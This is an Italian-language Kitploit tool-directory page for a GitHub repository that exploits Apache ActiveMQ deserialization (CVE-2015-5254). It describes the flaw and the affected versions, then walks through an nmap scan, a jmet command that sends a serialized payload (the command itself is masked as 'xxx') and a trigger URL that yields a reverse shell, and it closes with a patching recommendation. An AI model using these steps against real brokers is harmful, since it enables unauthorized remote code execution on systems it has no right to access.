Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ActiveMQ_CVE-2015-5254 — ActiveMQ_CVE-2015-5254 | Kitploit
Strumenti/GitHubGitHub/ma1dong/activemq_cve-2015-5254
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebStrumento di Accesso Remoto
GitHubma1dong/activemq_cve-2015-5254

ActiveMQ_CVE-2015-5254

ActiveMQ_CVE-2015-5254

Vedi Repository
2136 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Deserializzazione di ActiveMQ (CVE-2015-5254)

Descrizione della vulnerabilità: esiste una vulnerabilità di sicurezza nelle versioni 5.x precedenti ad Apache ActiveMQ 5.13.0. La vulnerabilità deriva dal fatto che il programma non limita le classi che possono essere serializzate nel broker. Un utente malintenzionato remoto può eseguire codice arbitrario utilizzando un oggetto Java Message Service (JMS) ObjectMessage serializzato appositamente predisposto.

Versioni affette: versioni 5.x di Apache ActiveMQ precedenti alla 5.13.0

0x01 Accedi al pannello di amministrazione per determinare la versione: http://IP:8161

Image text

0x02 Determina se la porta 61616 è aperta: nmap -sV -Pn -T4 -sC -p 61616 IP Image text

0x03 Invia il payload di reverse shell: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616 Image text

0x04 Clicca per attivare Browse event - ID del messaggio, ottenendo una reverse shell riuscita: http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event Image text

Raccomandazione di riparazione: aggiornare all'ultima versione, configurare regole WAF appropriate per bloccare.

Scarica lo strumento